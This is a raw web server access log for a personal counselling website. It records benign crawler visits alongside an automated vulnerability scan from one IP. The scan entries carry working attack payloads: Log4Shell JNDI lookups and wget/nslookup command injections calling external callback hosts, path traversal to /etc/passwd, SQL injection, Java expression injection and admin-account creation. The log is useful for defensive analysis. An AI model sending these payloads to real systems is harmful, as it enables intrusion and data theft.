147.182.222.20 - - [07/Dec/2022:18:14:04 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:07 -0800] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:18 -0800] "GET /CMSInstall/install.aspx HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:21 -0800] "GET /owa/auth/x.js HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:26 -0800] "POST /storfs-asup HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:33 -0800] "POST /run HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
64.124.8.47 - - [07/Dec/2022:18:26:03 -0800] "GET /helpful_tips/beating_the_holiday_blues HTTP/1.1" 200 7714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
40.77.167.65 - - [07/Dec/2022:18:29:27 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "mikemarino.us"
216.244.66.240 - - [07/Dec/2022:18:30:38 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.mikemarino.us"
54.89.116.210 - - [07/Dec/2022:18:33:26 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
54.89.116.210 - - [07/Dec/2022:18:33:27 -0800] "GET / HTTP/1.1" 200 19827 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
52.38.196.172 - - [07/Dec/2022:18:33:58 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "mikemarino.us"
43.130.66.225 - - [07/Dec/2022:18:42:11 -0800] "GET /wp-admin/css/ HTTP/1.1" 404 88 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "mikemarino.us"
43.130.66.225 - - [07/Dec/2022:18:42:17 -0800] "GET /sites/default/files/ HTTP/1.1" 404 88 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "mikemarino.us"
43.130.66.225 - - [07/Dec/2022:18:42:20 -0800] "GET /admin/controller/extension/extension/ HTTP/1.1" 404 88 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "mikemarino.us"
43.130.66.225 - - [07/Dec/2022:18:42:23 -0800] "GET /uploads/ HTTP/1.1" 404 88 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "mikemarino.us"
43.130.66.225 - - [07/Dec/2022:18:42:26 -0800] "GET /images/ HTTP/1.1" 404 88 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "mikemarino.us"
43.130.66.225 - - [07/Dec/2022:18:42:30 -0800] "GET /files/ HTTP/1.1" 404 88 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:18:43:35 -0800] "POST /session/create HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:44:58 -0800] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:45:02 -0800] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 88 "-" "Nacos-Server" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:46:31 -0800] "GET /hsqldb%0a HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:46:35 -0800] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:46:39 -0800] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:46:43 -0800] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:46:47 -0800] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:47:34 -0800] "POST /cgi?2 HTTP/1.1" 404 88 "http://mikemarino.us.p9.hostingprod.com/mainFrame.htm" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:47:38 -0800] "POST /cgi?7 HTTP/1.1" 404 88 "http://mikemarino.us.p9.hostingprod.com/mainFrame.htm" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:56:43 -0800] "POST /api/timelion/run HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:57:11 -0800] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:57:35 -0800] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:58:57 -0800] "GET /dashboardUser HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:59:52 -0800] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:59:56 -0800] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:59:57 -0800] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:00:29 -0800] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
185.191.171.41 - - [07/Dec/2022:19:04:36 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "mikemarino.us"
185.191.171.38 - - [07/Dec/2022:19:04:37 -0800] "GET /speaker/relationship_101_-_resolving_conflict HTTP/1.1" 200 4715 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:19:10:04 -0800] "POST /service/extdirect HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
195.191.219.130 - - [07/Dec/2022:19:11:54 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "mikemarino.us"
195.191.219.130 - - [07/Dec/2022:19:11:59 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:19:15:13 -0800] "POST /account/index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:15:16 -0800] "POST /opensis/index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:15:20 -0800] "POST /index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
54.36.148.17 - - [07/Dec/2022:19:24:50 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:19:30:01 -0800] "POST /cobbler_api HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:30:08 -0800] "GET /?x=${jndi:ldap://${hostName}.uri.ce8hcsnmqs0tn2g00010ewfr974bikboy.oast.live/a} HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:30:12 -0800] "GET / HTTP/1.1" 200 19827 "${jndi:ldap://${hostName}.referer.ce8hcsnmqs0tn2g00010o83e7ep3ucp6j.oast.live}" "${jndi:ldap://${hostName}.useragent.ce8hcsnmqs0tn2g00010oi9jgu74gkcg8.oast.live}" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:31:12 -0800] "POST / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:31:16 -0800] "POST / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:31:17 -0800] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:31:19 -0800] "POST /servlet/UploadServlet HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:31:21 -0800] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:31:23 -0800] "GET /test.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:34:30 -0800] "POST /website/blog/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:34:34 -0800] "POST /_search HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
114.119.146.185 - - [07/Dec/2022:19:36:06 -0800] "GET /speaker/the_wounded_healer_%E2%80%93_help_for_the_helpers HTTP/1.1" 200 4707 "https://www.mikemarino.us/speaker/marriage_911" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.mikemarino.us"
147.182.222.20 - - [07/Dec/2022:19:38:39 -0800] "GET /dumpmdm.cmd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:43:03 -0800] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/artifactory/webapp/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:43:28 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:46:32 -0800] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:46:44 -0800] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:46:49 -0800] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:47:10 -0800] "GET /wan.htm HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:19:49:03 -0800] "POST /integration/saveGangster.action HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:14:29 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
54.242.13.218 - - [07/Dec/2022:20:15:30 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
54.242.13.218 - - [07/Dec/2022:20:15:30 -0800] "GET /contact HTTP/1.1" 200 17847 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:20:15:42 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:15:45 -0800] "GET /wp-content/uploads/workreap-temp/2IbagoZS8Ce2vCxu6CqFQLpjuUh.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:15:49 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:15:52 -0800] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
118.184.177.11 - - [07/Dec/2022:20:18:04 -0800] "GET / HTTP/1.1" 200 4548 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.mikemarino.us"
147.182.222.20 - - [07/Dec/2022:20:22:34 -0800] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:24:59 -0800] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:25:02 -0800] "GET /wp-content/uploads/html2wp/2IbagpZOn2Pwsrumh7MZSUvCRvb.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:26:43 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
66.249.66.81 - - [07/Dec/2022:20:27:53 -0800] "GET /ads.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:20:27:58 -0800] "GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=di5g2p&adminpassword=fHcRMx&adminemail=test@test.com&adminname=test HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:28:54 -0800] "GET /?location=search HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:29:58 -0800] "POST /webapi/auth HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:30:03 -0800] "GET /free_time.cgi HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:30:06 -0800] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.191.171.8 - - [07/Dec/2022:20:30:06 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
185.191.171.42 - - [07/Dec/2022:20:30:07 -0800] "GET /helpful_tips/navigating_through_lifes_storms HTTP/1.1" 200 6172 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
147.182.222.20 - - [07/Dec/2022:20:30:12 -0800] "POST /Side.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:30:24 -0800] "GET /logfile?d=crossdomain.xml HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:30:46 -0800] "GET /webadmin/script?command=|%20nslookup%20ce8hcsnmqs0tn2g00010dkhjgrxbe7uqk.oast.live HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:32:57 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
111.207.155.211 - - [07/Dec/2022:20:34:59 -0800] "GET / HTTP/1.1" 200 19827 "-" "Mozilla/5.0 Firefox/35.0" "mikemarino.us"
64.124.8.28 - - [07/Dec/2022:20:40:38 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.28 - - [07/Dec/2022:20:40:38 -0800] "GET /helpful_tips/a_scriptural_perspective_on_anger HTTP/1.1" 200 6981 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:20:42:45 -0800] "GET /?url=http://0177.0.0.1/server-status HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:20:42:48 -0800] "GET /?host=http://0177.0.0.1/server-status HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
